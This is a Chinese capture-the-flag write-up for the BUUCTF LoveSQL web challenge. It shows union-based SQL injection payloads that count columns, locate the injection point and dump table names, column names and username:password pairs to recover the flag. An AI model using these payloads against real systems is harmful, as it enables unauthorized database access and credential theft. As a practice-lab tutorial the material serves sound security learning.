1、打开靶机:BUUCTF在线评测,选择web---->【极客大挑战2019】LoveSQL
打开被测试站点,是这个样子的,是上一题EasySQL的延续。
2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下:
直接给出了密码。
使用正确的用户名和密码登录一下,结果还是
那使用MD5库碰撞一下,结果也没碰撞出来。
3、继续寻常注入吧。
爆破有多少列(字段数)
username=admin&password=6ec1cab790051296b99514856f25f48b' order by 3 %23 //不报错
username=admin&password=6ec1cab790051296b99514856f25f48b' order by 4 %23 //报错
可知一共有3列。
爆破注入点
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,3 %23
爆破数据库
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,database() %23
爆破表名
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23
先爆表geekuser字段名
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser' %23
在爆破表l0ve1ysq1字段
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1' %23
两个表的字段,都是id,username,password
爆表geekuser数据
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(username,0x3a,password) from geekuser %23
结果不是我们想要的。
继续爆表l0ve1ysq1数据
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(username,0x3a,password) from l0ve1ysq1 %23
爆出flag。